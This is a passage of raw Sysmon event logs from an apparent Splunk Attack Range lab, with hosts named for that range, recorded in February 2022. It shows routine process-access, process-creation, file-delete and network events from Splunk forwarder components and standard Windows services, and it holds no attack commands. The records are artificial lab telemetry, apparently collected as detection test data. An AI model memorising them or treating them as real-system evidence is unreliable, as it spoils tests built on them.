Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B63C2E31153FDFD85D9C18EA80E0B450,SHA256=E8C0A3BF218BD6413D0D3CC9B85FCD27B98FC6D282DA897DA022524200955B3D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223378Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:17.658{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51783-false10.0.1.12-8000- 10341000x8000000000000000299509Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:19.572{C8EA50B7-1A53-6216-8007-000000003802}19126112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299508Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:19.171{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1A53-6216-8007-000000003802}1912C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299507Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:19.171{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299506Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:19.171{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299505Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:19.171{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299504Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:19.171{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299503Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:19.171{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-1A53-6216-8007-000000003802}1912C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000299502Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:19.171{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1A53-6216-8007-000000003802}1912C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000299501Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:19.173{C8EA50B7-1A53-6216-8007-000000003802}1912C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000299528Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:20.836{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C90C4DFD0528E521821EA73B442AECEA,SHA256=6CCFEB10FE7043456E3C55AE8E554A034D9193D8D77F213672522EAA5FC076CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223380Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:20.796{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10E5486A4736A008C985F7A4BD5F0F86,SHA256=81A5D96F8775DAD81731A695382C709AD0E8758835E7A1AA81826D7975C71555,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299527Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:20.718{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1A54-6216-8207-000000003802}844C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299526Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:20.718{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299525Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:20.718{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299524Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:20.718{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299523Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:20.718{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299522Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:20.718{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-1A54-6216-8207-000000003802}844C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000299521Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:20.718{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1A54-6216-8207-000000003802}844C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000299520Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:20.720{C8EA50B7-1A54-6216-8207-000000003802}844C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000299519Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:20.272{C8EA50B7-1A54-6216-8107-000000003802}69604568C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299518Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:20.019{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1A54-6216-8107-000000003802}6960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299517Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:20.019{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299516Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:20.019{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299515Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:20.019{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1A54-6216-8107-000000003802}6960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000299514Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:20.019{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299513Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:20.019{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299512Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:20.019{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1A54-6216-8107-000000003802}6960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000299511Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:20.020{C8EA50B7-1A54-6216-8107-000000003802}6960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000223381Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:21.796{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 